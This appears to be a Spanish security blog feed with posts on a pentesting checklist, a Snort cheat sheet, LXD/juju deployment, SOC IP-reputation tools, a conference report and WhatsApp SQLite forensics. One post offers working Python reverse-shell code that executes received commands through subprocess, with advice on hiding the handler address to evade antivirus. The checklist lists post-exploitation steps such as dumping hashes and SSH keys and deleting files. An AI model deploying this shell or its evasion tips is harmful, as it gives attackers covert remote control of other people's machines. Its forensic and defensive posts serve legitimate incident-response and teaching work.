Seguridad para Todos | ST2

Guia rápida para realizar un Pentesting

noreply@blogger.com (Julian J. Gonzalez) — Tue, 01 Oct 2019 07:39:00 +0000

Autor: Israel Nadal

A través de su cuenta de Twitter, publico un hilo donde explicaba de forma sencilla y concreta, su metodología para realizar un Pentesting.

Guía para realizar un Pentesting de Israel Nadal

ESCANEO DE LA RED

nmap -sn 10.11.1.* nmap -sL 10.11.1.* nbtscan -r 10.11.1.0/24 smbtree netdiscover

ESCANEO AL HOST

nmap --top-ports 20 --open -iL iplist.txt nmap -sS -A -sV -O -p- ipaddress nmap -sU ipaddress

ESCANEO DE LOS SERVICIOS

SERVICIOS WEBNikto dirb dirbuster wpscan otdotpwn view source davtest\cadevar droopscan joomscan LFI\RFI Test S.O. LINUX/WINDOWSsnmpwalk -c public -v1 ipaddress 1 smbclient -L //ipaddress showmount -e ipaddress port rpcinfo Enum4Linux

OTROSnmap scripts (locate *nse* | grep servicename) MSF Aux Modules

POST EXPLOTACIÓN

LINUXhttp://linux-local-enum.shhttp://inuxprivchecker.pyhttp://linux-exploit-suggestor.shhttp://unix-privesc-check.py WINDOWSwpc.exe http://windows-exploit-suggestor.pywindows_privesc_check.py windows-privesc-check2.exe

ESCALADA DE PRIVILEGIOS

Acceso a servicios internos (portfwd) Añadir una cuenta WINDOWS Lista de exploits LINUX Sudo su KernelDB Searchsploit

FINALIZACIÓN

Capturas de pantalla IPConfig\WhoamI Dump hashes Dump SSH Keys Borrado de archivos Documentación final.

Me he tomado la liberta de "compartir" esta pequeña guian en el Blog para que no caiga en el olvido del timeline de Twitter.

Gracias Israel por compartir

Great SNORT - Cheat Sheet

noreply@blogger.com (Julian J. Gonzalez) — Tue, 01 Oct 2019 07:18:00 +0000

Cheat Sheet - SNORT

Hace tiempo escribí un articulo sobre la distribución Security Onion, que podéis leer aquí.

El proyecto ha seguido evolucionando, son numerosos los cambios introducidos, para aquellos interesados os dejo el enlace:

- Información: https://securityonion.net

- Download: https://github.com/Security-Onion-Solutions/security-onion/blob/master/Verify_ISO.md

Pero el motivo de escribir esta "mini" entrada, es compartir con todos una hoja resumen de comando sobre SNORT,

Please, If you want to know how works SNORT go to: https://www.snort.org/, but if you know how it works, then you must want to have the following cheat sheet.

The Snort Cheat Sheet covers:

Sniffer mode, Packet logger mode, and NIDS mode operation
Snort rules format
Logger mode command line options
NIDS mode options
Alert and rule examples

REF: https://www.comparitech.com/net-admin/snort-cheat-sheet/

Thanks to Hannah, who send me a email with Link.

conjure-up / juju Magic & Linux Container (LXD)

noreply@blogger.com (Julian J. Gonzalez) — Tue, 15 May 2018 16:00:00 +0000

Con este titulo más parecido a un capitulo de Harry Potter, os presento el Orquestador para Linux Container (LXD). Ver enlace.

OpenStack / LXD + JujuCharms (https://jujucharms.com/)

Como si por arte de "Magia" se tratase, "conjure-up" es la forma más rápida (dependerá de tus recursos principalmente el disco duro SSD) de crear un cluster Kubernetes perfectamente configurado y listo para trabajar.

Limitaciones

Si deseas trabajar "localmente" en un Host, se presentan ciertas limitaciones técnicas a la hora de utilizar conjure-up, o incluso "juju".

La instalación local solamente contempla trabajar con un "equipo físico (hardware)", aunque la herramienta juju permite trabajar con múltiples proveedores de Cloud (Azure, Google Cloud , AWS) será utilizando LXD localmente cuando más partido se le puede sacar a estar herramienta.
Networking, se debe diseñar muy bien inicialmente todo lo necesario para la comunicación entre los contenedores, así como la publicación de los recursos. Si trabajas con un cluster Kubernetes ya tendrás cierta experiencia en ello. No obstante, hay que realizar un buen planteamiento de networking antes de comenzar. Sobre todo con el objetivo de la publicación de los recursos.

Esas son las principales "limitaciones", puesto que si deseamos disponer de múltiples Host (bare metal / hardware) la opción de utilizar conjure-up "localmente" no contempla de momento la capacidad de "clustering" que trae LXD 3.0. Por lo que el diseño de networkin inicial será fundamental para ser capaz de comunicar varios Host (Hardware / VM) entre si, y las APP contenidas en LXD. Un ejemplo claro, es desplegar todo un cluster Kubernetes en un Host (localhost) y luego querer ampliar la capacidad del cluster añadiendo "Worker / Nodos al cluster" en otros Host para alta disponibilidad y recursos. Esto requiere de un diseño de la red (previo al despliegue) y "tunning" a nivel de networking para lograrlo. Puesto que la herramienta de momento (como he comentado anteriormente) no contempla la capacidad de utilizar la funcionalidad nativa de clustering.

Cómo parece lógico, la opción de utilizar LXD, es evitar utilizar HyperV/VMWare en tus servidores locales, creando tu propia Cloud con los recursos hardware directamente con LXD, que por otro lado, mejoran los resultados al trabajar con lo que denominan pure-container hypervisor [info].

Por tanto, si quieres trabajar en producción con LXD + juju como orquestador, te recomiendo:

Una Host con al menos 128GB RAM, 4 CPUS, disco duro SSD local + cabina (storage) con direct attach de tipo SSD,

Un según Host de igual capacidad conectado a la cabina storage (direct Attach)

Con esto montar dos "cluster locales kuebernetes" y utilizar la capacidad de federación entre cluster de kubernetes, que permitirá repartir y balancear los recursos entre los cluster federados. [info]

Ventajas

No todo iban a ser limitaciones, para el área DevOps y el ciclo de CI/CD Integración continua) todo son ventajas:

Montar un cluster Kubernetes rápidamente totalmente operativo.
Desplegar Jenkins (integración continua) y Sonar (Auditoria de Código)
Y Probar las aplicaciones en un entorno igual al de producción en los principales Proveedores de Cloud.

Happy Hacking !!! DevOps ! :)

[cymon-analyzer] | Modulo de Análisis Reputación IP en Cymon.io para Cortex Engine | theHive-project

noreply@blogger.com (Julian J. Gonzalez) — Thu, 14 Sep 2017 10:10:00 +0000

Cuando eres un Tier1/L2 SOC Security Analyst disponer de la mejor herramienta para la toma de decisiones es fundamental con objeto de "responde" ante una Amenaza de la mejor forma y lo más rápido posible.

En mi paso como "Manager" del antiguo equipo del Centro de Inteligencia y Operaciones de Seguridad, denominado SSIC por la siglas (SVT Security Intelligence & Operations Center), se indicaba que la prioridad era conseguir herramientas que permitan a nuestros analistas L1 / L2 disponer de la mejor información en el menor tiempo posible, permitiendo decisiones / acciones inmediatas.

Es un placer compartir con la comunidad el desarrollo de un módulo para análisis de direcciones IP "sospechosas", os presento, cymon-analyzer, es un plugins (analizador) desarrollado para el motor Cortex del proyecto [TheHive-Project]

Descripción

cymon-analyzer permite analizar información sobre la reputación IP en un "Incidente / Alerta" de seguridad en el servicio cymon.io (Open Threat Intelligence) de forma automática, para ello se utiliza la API que nos proporciona este servicio.

He desarrollado un modulo para Cortex, que permite analizar rápidamente y comprobar si la IP detectada como "potencialmente peligrosa" (observable / evidencia) esta listada en "lista negras" por mala reputación [Malware, Spam, Phishing, blacklist, Actividad Maliciosa, etc].

cymon-analyzer | Working in TheHive Platform | Captura pantalla del analyzer en funcionamiento.

De forma automática, un analista puede comprobar y obtener información desde múltiples IP / Observables con un solo click. Se puede ejecutar el Analyzer, y el motor [Cortex] a través del Analizador se encarga de consultar "IP por IP" al servicio cymon.io devolviendo la información en forma de etiqueta e Informe.

Full Report | Informe resultante cymon-analyzers

TheHive-Project es una plataforma de gestión de Incidentes de Seguridad (~~relativamente nueva~~) consolidada, que proporciona la herramienta que un SOC/CERT necesita.

Es una herramienta desarrollada por expertos en Seguridad para equipos de Seguridad. Sus capacidades de integración son espectaculares, no solo gracias a la comunidad que cada día desarrolla más "Analyzer" incrementando el valor de la herramienta y sus capacidades, sino también debido a la capacidad de integración que proporciona la API de la plataforma.

Si estáis interesados, podéis conseguir el analyzer en mi cuenta personal de GitHUB | ST2Labs

Repositorio: cymon-analyzer

Enlaces de Interés

ST2Labs

Qurtuba Security Congress 2016

noreply@blogger.com (Unknown) — Mon, 19 Sep 2016 19:49:00 +0000

Grandes profesionales de toda España unidos con los mismos objetivos: concienciar y enseñar.

Durante los días 16 y 17 de septiembre ha tenido lugar Qurtuba. Congreso de seguridad celebrado en la ciudad de Córdoba que atrae a centenares de interesados en ciberseguridad.

Entre los organizadores encontramos a Miguel Ángel Arroyo y Edu Sánchez. Dos profesionales dedicados a la seguridad y la enseñanza cuya pasión es aprender y compartir. Así nos lo trasmiten en cada evento de seguridad organizado por ellos mismos o a los que asisten, no solo en Córdoba, sino en toda España. Como fue el celebrado el día previo a Qurtuba, "Hack&Beers".

Un total de 13 ponentes y diversos talleres se han desarrollado durante estos días.

Introducción

A continuación, un breve resumen de las ponencias más destacadas.

Josep Bardallo, executive manager en Svt Cloud.
“Seguridad en entornos hospitalarios & iOT”.

Nos destaca la gran cantidad de iOT utilizados en hospitales e instituciones sanitarias pensados para salvar vidas y avanzar en resultados de pacientes, cuya labor cumplen muy bien, pero… ¿Qué pasa con la seguridad de estos aparatos?... Los fabricantes se olvidan de ella, olvidando que todos están conectados de una manera u otra a Internet y, por lo tanto, disponibles para los cibercriminales.

Con una simple búsqueda de cámaras de vigilancia a través de Shodan nos “cuela” en centros de educación y centros penitenciarios entre otros lugares, donde han olvidado, una vez más la seguridad dejando la configuración por defecto del fabricante.

Daniel Medianero “Marketing Service Manager” en s21sec.
“Hackeando las emociones: una nueva visión de la ingeniería soial”.

Daniel nos invita a analizar el comportamiento de los seres humanos, de nosotros mismos, la importancia del lenguaje no verbal y de toda la información que nos trasmite, que, en muchas ocasiones, por desconocimiento, no le prestamos la atención que deberíamos.

Con ejemplos de la vida cotidiana, o televisivos, nos enseña desde quién está intentando establecer un simple “coqueteo” a quién pretende dejar claro que es “su territorio”, su poder en ese momento o sobre la situación.

Y lo que es más importante, la fuerza que tienen estas técnicas para el atacante, siendo utilizadas para elegir a la víctima que considera más vulnerable o fácil de "manejar".

Del último de los ponentes que os hablaremos es Francisco J Rodríguez, miembro de INCIBE con su conferencia “Is it a game or is it real?”

Al igual que Josep Bardallo, Francisco Rodríguez nos trasmite como iOT se encuentra cada vez más extendido y más desarrollado, pero, no más seguro.

Es decir, cada vez son más los aparatos dentro de un hogar que se encuentran conectados, expuestos (teléfono, tablet, luces, frigorífico… ¡hasta el WC!)

¿De verdad creemos que estamos a salvo? Grandes empresas se han visto afectadas por ataques de cibercriminales ¿Qué nos hace pensar que los siguientes no podemos ser nosotros?
Nos hace reflexionar sobre si esto es necesario ya que, por ganar en comodidad, exponemos nuestra seguridad, nuestra vida privada.

Francisco nos muestra como desde INCIBE estudian a los cibercriminales a través de HoneyPot, sistemas con vulnerabilidades expuestos en la red para obtener toda la información posible de cómo actúa el cibercriminal y poder combatirlo

Entre estos ponentes, se encuentran muchos otros, los cuales podéis ver en la programación
En el segundo día del congreso, se realizaron talleres sobre diferentes temas de concienciación, ingeniería social, análisis forense, etc

Cada uno de ellos con diferentes niveles destinados a todo el público que se está iniciando en estos caminos o el que ya lleva unos pasitos.

Además de conferencias y talleres, durante el congreso ha tenido lugar un CTF, "Capture The Flag" proporcionándole a los ganadores la entrada a cybercamp 2016.

Sin duda alguna, es uno de los mejores congresos de seguridad informática en la ciudad de Córdoba donde desvirtualizas a profesionales y adquieres nuevos conocimientos.

A través de twitter pueden ver toda la actividad producida por este evento con el hastag #Q2k16 .
Si este año te lo has perdido, no dejes que se te escape la siguiente edición en @qutubacon nos mantiene informados.

Lucía Expósito Ortega
@LuciaExpositoOrt

[SIPI] Simple IP Information Tool is out

noreply@blogger.com (Julian J. Gonzalez) — Fri, 01 Apr 2016 14:36:00 +0000

Cuando se reciben miles de ataques desde Internet, es necesario disponer de información que permita tomar decisiones de una forma ágil y rápida. En un CERT/SOC, es decir en un centro de operaciones de ciberseguridad, es primordial disponer de información sobre una posible amenaza para ejecutar acciones y/o medidas de prevención, protección y defensa.

Introducción

Por ejemplo, se detecta un tcp_scan en el IPS / Cortafuegos:

FortiAnalyzer - Event Manager - IPS

A priori no se sabe si es lícito o no, para resolver el misterio se puede consultar la información sobre la lista de direcciones IP origen, en alguna de las múltiples fuentes de información / blacklist (véase las principales fuentes de información sobre reputación y actividad de las IP en Internet):

The Top Cyber Threat Intelligence Feeds

AlienVault.com: Multiple sources including large honeynets that profile adversaries.
CrowdStrike.com: Advanced threat intel as part of their threat protection platform.
Cyveilance.com: Unique feeds on threat actors: indications of criminal intent.
EmergingThreats.net: A variety of feeds.
FireEye.com: DTI- Dynamic Threat Intelligence service.
H ackSurfer.com (SurfWatch): Insights tailored to your business.
HexisCyber.com: Feed supports automated actions.
InternetIdentity.com: Threat feeds from their big data solution ActiveTrust.
iSightPartners.com: ThreatScape series.
LookingGlass.com: Maps of infrastructure, connectivity and ownership, plus threat intel.
MalwareCheck.org: Intelligence on any URL
MalwareDomains.com: A list of domains known to be associated with malware.
RedSkyAlliance.com: A vetted team of corporate computer incident responders and security professionals.
RecordedFuture.com: Organizes information from the Internet.
SecureWorks.com: Provides feeds and also instruments networks.
Symantec.com: DeepInsight feeds on a variety of topics including reputation.
Team-Cymru.com: Threat intelligence plus bogon lists.
TheCyberThreat: Our Twitter feed. High level but comprehensive and curated.
ThreatConnect.com: by Cyber Squared. Focused on information sharing.
ThreatGrid.com: Unified malware analysis. Now part of Cisco.
ThreatIntelligenceReview.com: Updated reviews of threat intelligence sources.
ThreatStop.com: Block Botnets by IP reputation.
ThreatStream.com: Famous team. Multiple sources in interoperable platform.
ThreatTrack.com: Stream of malicious URLs,IPs and malware/phishing related data.
Verisigninc.com: iDefense feeds highly regarded by some key institutions.

Comprobar todas y cada una de ellas, puede ser un proceso lento y muy tedioso. Recientemente ha nacido un proyecto que unifica en solo portal toda la información sobre reputación, actividad maliciosa y comportamiento de las direcciones IP reportados por las múltiples fuentes de información con objeto de generar una base de datos de conocimiento única donde con una sola consulta se pueda conocer si una dirección IP esta considerada "una amenaza" real o sin embargo esta considerada como una amenza potencial.

Estoy hablando del proyecto http://cymon.io

Una consulta en la web, permite analizar la información de la dirección IP en múltiples fuentes de información, lo que permite ahorrar tiempo en dicho análisis. Este proyecto además cuenta con una API de desarrollo que permite automatizar el proceso.

Como ya se anunciaba en nuestro anterior artículo, el departamento MSOC (Monitoring & CyberSOC) de www.svtcloud.com ha desarrollado una herramienta [sIPi] que aprovecha esta API de consulta, para automatizar el proceso de obtención de información relacionada con una lista de direcciones IP. Se puede consultar 1000 direcciones IP/día, de forma totalmente gratuita.

[!] Simple IP Information Tools [SIPI]

sIPi (Simple IP Information Tools), así os como se ha bautizado a esta pequeña herramienta que en su versión 0.1, permite:

Analizar la reputación de la dirección IP [actividad malware, botnet, spam, dnsrbl, blacklist, etc] consultando las fuente Cymon.io
Nivel de exposición de las direcciones IP utilizando el motor SHODAN.io
Información de geolocalización básica de la IP utilizando IPInfo.io

Con esta utilidad se ha unificado en una sola herramienta la consulta de "IP Reputation data & IP Service exposure risk".

En esta primera versión 0.1, se puede analizar una sola IP o una lista de IP's, donde se puede consultar por una categoría [botnet, spam, malware, phishing, blacklist] o todas, así como añadir información sobre SHODAN.io o simplemente información sencilla de geolocalización.

Más información y ejemplos se pueden encontrar aquí:

// GET it NOW //
https://github.com/ST2Labs/SIPI

#ST2Labs
#SVTCloudSecurity

This tool is aimed for Incident Response Team and anyone what's want to know the behaviour of the "suspicious" IP Address. The tools do search looking for reputation info from a set of open threat intelligence sources. Information about this IP like malware activity, malicious activity, blacklist, spam and botnet activity.

IP Reputation Data & IP Risk Level Exposure

SVTCloud Monitoring & Security Operations Center (MSOC)

noreply@blogger.com (Julian J. Gonzalez) — Thu, 17 Mar 2016 10:30:00 +0000

Presentación

Desde el pasado mes de Febrero, tengo el placer de trabajar en @SVTCloud (www.svtcloud.com) como el responsable del servicio y departamento de Monitorización y Operaciones de Seguridad (MSOC).

Entre otros, el equipo de Seguridad del MSOC, ofrece los servicios:

- PSaaS - Perimetral Security as a Service, que consiste en la gestión operativa de dispositivos de seguridad perimetral en modo servicio.

- Alerta Temprana: realizando una monitorización constante 24x7, del estado de la seguridad.

- Respuesta ante incidentes: investigación y propuestas de contramedidas que permitan contener el incidente de seguridad, y proporcionar las bases de seguridad para prevenir en el futuro.

Por supuesto, la monitorización constante, nos permite detectar nuevos ataques, alertar y prevenir ataques e investigar con objeto de establecer líneas de defensa en los dispositivos perimetrales.

Una de las tareas más recurrentes en la detección de un ataque es conocer si el tráfico sospechoso con origen y/o destino desconocido (dirección IP) esta incluido relacionado con actividad maliciosa, SPAM, Malware, etc... fruto de nuestro trabajo diario, he desarrollado sIPi una herramienta que permite analizar una dirección IP o lista de direcciones IP, para obtener información relevante con respecto a:

- Nivel de reputación / actividad asociada a dicha IP: es decir, analizar si la IP esta involucrada en SPAM, actividad Malware y/o pertenece a una red Botnet. Utilizando el servicio ofrecido por http://cymon.io

- Nivel de exposición: analizar la IP y conocer cuál es su nivel de exposición en Internet, a través del buscador http://shodan.io

- Información básica de geolocalización: analizar la información de la IP, obteniendo información simple de la misma, a través de http://ipinfo.io

sIPi - Simple IP Information Tools

La herramienta integra en una sola consulta la información que se obtendría por separado, consultando en cada una de las fuentes de información.

En breve publicaré la herramienta en mi GitHub (https://github.com/st2labs) estad atentos !!!

Os dejo una captura:

[@St2labs | @Svtcloud] - sIPi Tools output

Pronto en mi https://github.com/st2labs

#ST2Labs

#SVTCloud

www.st2labs.com / www.svtcloud.com

Feliz Navidad with Custom Python Reverse Shell

noreply@blogger.com (Julian J. Gonzalez) — Wed, 23 Dec 2015 09:50:00 +0000

Este año es mi quinta (5) Navidad con vosotros, parece que fuera ayer (25/Dic 2011) cuando celebré la primera Navidad con todos vosotros, el camino recorrido hasta ahora ha sido gratificante y emocionante, pero quizás lo es aún más el camino que queda por recorrer.

Como es habitual, la intensidad con la que publico artículos se encuentra supeditada a la vida misma (y a los deseos de mi pequeña xD), el pasado 2014, se me olvido felicitar la Navidad, por lo que este año me ha parecido que la mejor forma de celebrarlo con vosotros es compartiendo el código de una shell reversa escrita en python ... que puede resultar de gran utilidad durante una Auditoria / Pentesting.

Muchas Gracias a todos por seguirme y leer mis publicaciones, no vemos el año próximo. Feliz Navidad con mis mejores deseos para el año que viene.

Custom Python Reverse Shell

Code*:

def shell():

   #Base64 encoded reverse shell
   try:
       s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       s.connect(('127.0.0.1', int(443)))
       s.send('[*] Connection Established!')
       while 1:
             cmd = s.recv(1024)
             if cmd == "quit":
                 break
             response = run_cmd(cmd)
             if response:
                 encoded = base64.b64encode(response)
             else:
                 response = 'Running: {}'.format(cmd)
             encoded = base64.b64encode(response)
             s.send(encoded)
    except socket.error:
       sys.exit(2)
    except WindowsError:
       pass
    finally:
       s.close()

Es un fragmento de como se puede implementar una "Shell" de conexión inversa en python de forma sencilla. Falta por supuesto como ejecutar comandos en el sistema:

def run_cmd(data):
      proc = subprocess.Popen(data,
                                     shell=True,
                stdout=subprocess.PIPE,
                 stderr=subprocess.PIPE,
                  stdin=subprocess.PIPE)
      stdout = proc.stdout.read() + proc.stderr.read()
      return stdout

He utilizado subprocess para la ejecución de "comandos" en el sistema remoto. Estoy seguro que mas de uno esta pensando técnicas para mejorar la shell, implementar nuevos comandos, etc. Por ejemplo, la IP podría cogerla de un registro DNS, o de un recurso WEB publico, para evitar hardcodear (incrustar) la IP dentro del código fuente. Se recomienda, hardcodear en base64 la URL del recurso WEB para determinar la IP del "handler" y tratar de evitar la detección como malware por los antivirus (Alguien se anima a mejorar la Shell implementando la obtención de la IP desde un recurso web publico como pastenBIN?)

Compatible tanto en Windows como en Linux, se puede crear un ejecutable para Windows utilizando pyexe o pyinstaller.

Es un "shell" muy simple pero efectiva. Os invito a probarla y comentar las limitaciones que tiene la Shell y como se podrían solventar!

Por supuesto, os dejo como trabajo para casa, la creación del "cliente" que se conecta y maneja la conexión inversa con la shell .. xD

#ST2 #ST2Labs os desea:

¡¡¡FeliZ Navidad!!! - Merry Christmas - Joyeux Noël - Frohe Weihnachten - С Рождеством - 圣诞节快乐 - Buon Natale - God Jul -Feliz Natal ...

@rhodius | @seguridadxato2 | @st2labs

[*] Basada en el código de primalsecurity

Digital Forensics of Android WhatsApp SQLite Database (Part III)

noreply@blogger.com (Julian J. Gonzalez) — Wed, 16 Dec 2015 07:00:00 +0000

En este artículo abordaré la recuperación de mensajes borrado en la aplicación WhatsApp, como ya comente en la parte I y II, la capacidad de recuperación de mensajes eliminados es inversamente proporcional al periodo de tiempo transcurrido desde que se produjo el hecho, así como a la intensidad de uso de la aplicación en dicho periodo.

Es decir, cuanto mayor sea la intensidad y el tiempo transcurrido menor es la probabilidad de recuperar la información.

Recuperando mensajes eliminados de WhatsApp - Recovery Data

Si recordamos en la segunda parte, el timestamp de un mensaje consta de 6 bytes y se encuentra justo a continuación de los datos, tal y como se puede ver en la siguiente imagen:

ST2Labs 13 - Cell Data to Offset 11358

Pero antes de ponernos manos a la obra y decodificar el timestamp, se puede analizar la base de datos en busca de información eliminada, para ello, se deben de examinar el espacio sin utilizar (unallocated), los freeblock o incluso los freelist.

En las base de datos SQLite, existe la posibilidad de indicar que un registro (cell record) ha sido eliminado marcando el mismo como "freeblock" dentro de una página, además si se elimina una página entera, se puede marcar como Freelist.

La información residual que queda en una base de datos cuando no se sigue el estándar, es aquella que es eliminada desde la aplicación (chat) y simplemente se elimina su "indexación" en la base de datos, es decir, en aquel espacio que no esta asignado a ninguna función es denominado unallocated, y puede contener información que previamente ha sido eliminada, y que por tanto, no se encuentra indexada en la base de datos.

Por tanto resumiendo, la información eliminada puede estar ubicada en:

- unallocated space

- freeblock

- freelist

Además, si la base de datos es configurada con "rollback", puede existir archivos WAL (Write-Ahead Log) o Journal, que permite guardar una copia de seguridad de una página mientras esta se esta modificando y no ha recibido un "commit".

Si existe el fichero db-wal o db-journal, es muy recomendable realizar un análisis forense de dichos archivos, en busca de información relevante. Si existen esto archivos, no se recomienda abrir la base de datos con un visor de SQLite, ya que puede ejecutar un "commit" pendiente y borrar por completo toda la información que pudiera contener.

En nuestro caso, no disponemos de archivo db-wal, por lo que procedemos a analizar la información contenida en el archivo y que no esta consideraba como "válida", es decir, analizaremos todos los freeblock, unallocated y freelist que existan.

Realizar esta tarea de forma manual es bastante tediosa, ya que para cada página se debe de extraer la información que existe entre la ultima "celda - registro" y el final de Cell Pointer Array (como recordáis del artículo anterior".

Pero además, puede exisitr espacio "unallocated" entre celdas, y /o freeblock (son aquellas celdas que han sido marcadas como disponibles) al realizar la acción de eliminar mensajes.

Vamos con un ejemplo:

Abrimos la base de datos con un editor hexadecimal y analizamos el contenido de toda la página 3, ya que consideramos que es la más indicada al ser la que contiene la información de "mensajes". Si se ha eliminado algún mensaje debe de ser de esta página.

Datos de interés para la página 3, según la información analizada en el articulo 2:

- Offset page 3: 8192

- Ultima celda (registro) Offset: 11358

- Offset cell pointer: 8200

- Size Cell Pointer: 8 bytes

Por tanto, el espacio "unallocated" entre la utlima celda (registro) y el final de Cell Pointer Array se puede calcular tal que así:

Ini unallocated Offset = 8208

Size = 11358 - 8208 = 3150 bytes

Con ayuda de un editor hexadecimal, se obtiene:

ST2Labs 14 - Unallocated database pace for page 3

Se puede observar que existen varios mensajes como información residual en la página 3 de la base de datos, el key_id (identificador único de cada mensaje) esta compuesto por un "hash" y un número de secuencia, además con el timestamp de los mensajes se puede realizar el timeline correspondiente.

Por ejemplo, se procede a analizar la información para el mensaje:

ST2Labs 15 - Recovery Delete Message - Whatsapp

No existe una forma normalizada de finalizar un mensaje, para calcular el tamaño exacto del mensaje, se debe de decodificar el cell header y el payloda header, sin embargo, para los datos que han sido eliminado (no están indexados) no se conoce el offset de los registro eliminados, por lo que no se puede a priori determinar el inicio de la celda, salvo mediante técnica de prueba y error.

Por ello, obtener el timetamp, es coger los 6 bytes seguido al final del mensaje, para el caso de ejemplo, acaba sin ".", en otros casos puede que haya que probar más de una vez, por si el carácter "." forma parte del mensaje de texto o no.

En nuestro caso de ejemplo:

Timestamp: 01513407d3f8

Utilizando DFTime, la herramienta para convertir el timestamp a Fecha y Hora, se obtiene:

ST2Labs 16 - DFTime - Timestamp converter tools

Sin embargo, para asegurarse que no existe ningún otro mensaje eliminado disperso por la base de datos, se debe de analizar los freeblock dentro de la página 3.

La información, si existen freeblock o no, se encuentra dentro de la cabecera de cada una de las páginas, con ayuda de la herramienta DFSLite, se puede consultar todas y cada una de las cabeceras de las páginas de la base de datos, con el comando -B.

ST2Labs 17 - Page header - freeblock

Se analiza la información, y para la página 3 se detecta que existen 2 freeblock, donde el offset del primer freeblock es 3514 relativo a al offset de la página.

Se utiliza DFSLite, con la opción -u para obtener la información contenida dentro de los freeblock, y unallocated, tal que:

ST2Labs 18 - All messages recovery

Se ha utilizado strings para visualizar mejor los mensajes, pues la herramienta muestra la información en bruto (raw data). No obstante, para determinar el timestamp de los mensajes y montar un "timeline", se debe de abrir el archivo en hexadecimal y analizar de forma manual, tal y como se ha visto en este artículo.

Para descubrir todos los mensajes se deberá de analizar todas las páginas de la base de datos, por tanto cuanto mayor sea la base de datos, mas elaborado y mayor será el tiempo que se tardará en obtener los resultados.

Espero que haya sido de utilidad, a continuación os dejo el enlace al repositorio donde voy subiendo las herramientas.

DFTime Tools

Se puede descargar la herramienta desde el repositorio oficial de ST2Labs (https://github.com/ST2Labs/DFIR/tree/master/SQLite)

#ST2Labs

#GEOSystemSoftware

www.st2labs.com | www.seguridadparatodos.es

PD: El análisis de las freelist page os lo dejo como "trabajo" para casa. :) Al igual que realizar un análisis manual de los freeblock.

Digital Forensics of Android WhatsApp SQLite Database (Part II)

noreply@blogger.com (Julian J. Gonzalez) — Wed, 02 Dec 2015 17:00:00 +0000

En esta segunda parte, se procederá a recuperar un mensaje que ha sido eliminado en la base de datos SQLite de la aplicación WhatsApp y se analizará la información obtenida para determinar cuando se envío el mensaje (timestamp) recuperado.

Estructura de SQLite (II)

Una vez que conocemos el esquema de la base de datos, y como se organiza la información útil (payload data) dentro de las celdas de cada una de las páginas, es conveniente conocer el formato completo del fichero SQLite (file format) para navegar en el fichero de forma adecuada.

Lo primero que se necesita es conocer el tamaño de las páginas y el número total de páginas que contiene la base de datos, esta información se encuentra dentro de la cabecera de la base de datos (database header).

Analizando la base de datos del ejemplo (msgstore.db) y utilizando mi propia herramienta DFSLite (Digital Forensics SQlite Tools) desarrollada para la ocasión, se obtiene que:

ST2Labs 4 - SQLite Database Header Info

Como se observa en la imagen anterior, se tiene que:

Page_size = 4096
Num_page = 27

La base de datos en el momento del análisis tiene un máximo de 27 páginas, como cada página tiene un tamaño especifico, se puede calcular el Offset de acceso al fichero para cada una de las páginas utilizando la siguiente formula:

Offset (pagina N) = (N -1) * Page_size

Se debe de tener en cuenta que las páginas se numeran desde 1 hasta N, y que el Offset para la primera página es 0.

Cada página dentro de la base de datos (excepto la primera página) guardan el siguiente formato:

ST2Labs 5 - SQLite Page Format

Las celdas (registros) de la base de datos se rellenan desde el final de la página hacia el inicio, con objeto de permitir que el Cell Pointer Array aumente según se agregan registros a la página.

Analizando el contenido del "Cell Pointer Array" se obtienen el número de celdas que contiene la página y el offset relativo a la página donde comienzan. Con DFSLite se puede obtener un listado con todos los Cell Pointer Array e información sobre los registros que existen en cada una de las páginas de la base de datos de la siguiente forma:

ST2Labs 6 - SQLite Page Cell Pointer Array Info

ST2labs 7 - SQLite All Cell for Page List

Esta información es útil para identificar rápidamente que páginas tienen registros (celdas) de información y cuales no. Además de obtener el Offset absoluto y el número total de registros que hay dentro de la base de datos en cada página.

Toda esta información es interesante desde el punto de vista Forense, para centrar el análisis en aquellas páginas que no tengan registros (mayor espacio sin utilizar), en busca de posible información eliminada y que se encuentre almacenada.

Esto es posible, dado que como si de un sistema de ficheros se tratase cuando se elimina información de la base de datos, esta no se "borra" físicamente (no se sobrescribe de forma inmediata) simplemente se elimina el indice de localización de la información en la base de datos, y se queda residente en el fichero hasta que ésta sea sobrescrita posteriormente con otra información.

Por ello, el periodo de tiempo desde que un registro fue eliminado hasta que se analiza de forma forense es crucial para recuperar la mayor cantidad de información, influyendo directamente el nivel de intensidad de uso de la aplicación en ese tiempo con la capacidad de recuperación de información útil.

Hasta aquí la introducción resumida del formato SQLite, se puede profundizar más en el formato consultando la documentación oficial en el siguiente enlace.

A continuación vamos directos a analizar la estructura de la tabla "Messages" de la aplicación WhatsApp dentro de la base de datos SQLite.

Estructura base datos Whatsapp

Tal y como se comprobó en el primer articulo, con ayuda de la herramienta sqlite_ex, se averigua que la tabla "messages" de WhatsApp se encuentra almacenada en la página 3 de la base de datos SQLite (msgstore.db).

Con ayuda de un editor hexadecimal, abrimos la base de datos y nos dirigimos al Offset = 8192 correspondiente a la página 3 (véase la formula comentada anteriormente para el cálculo). Para localizar rápidamente los registros dentro de la página, me apoyo en la DFSLite con la opción -p 3, para analizar la estructura del CellPointerArray de la página, tal que así:

ST2Labs 9 - Cell Pointer Array Info Page 3

El CellPointer Array se encuentra en el Offset: 8200, se realiza un Decode de "Data" y se obtiene el total de Offset relativos a la página donde se encuentran los registros válidos (existentes) dentro de la base de datos:

Decode Cell Pointer Array Data:

- Offsets: [4048, 3390, 3269, 3166]

Con el Offset relativo a la página 3, se puede calcular el Offset de cada una de los registros válidos de la base de datos (msgstore.db).

por ejemplo: Cell Offset 3166 se corresponde con el Offset absoluto: 11358, se abre la base de datos con un editor hexadecimal y se obtiene:

ST2Labs 10 - Hexa Cell Data Offset 11358

La estructura de un registro (celda) de información de tipo Table, de una base de datos SQLite tiene la siguiente estructura:

ST2Labs 8 - Sqlite Cell File Format

Para calcular el tamaño de la celda, y el tamaño del payload la base de datos SQLite utiliza el tipo VarInt, que consiste en el algoritmo de codificación estático de Huffman de 64 bits, que permite codificar en un máximo de 9 bytes el tamaño de la celda y/o el payload data.

** Para este artículo, no se va a explicar como decodificar los tipo de datos VarInt.

Analizando la Información

Un registro (cell) dentro de la página 3 de la base de datos SQLite (msgstore.db) de la aplicación WhatsApp almacenará la información de la siguiente forma:

ST2Labs 11 - WhatsApp Cell Payload Data SQLite Struct

La información se almacena dentro de una "celda" de la base de datos SQLite de forma continua, la imagen 4 representa "payload data", por tanto lo más interesante es saber que después del mensaje "Data" a continuación le sigue el timestamp.

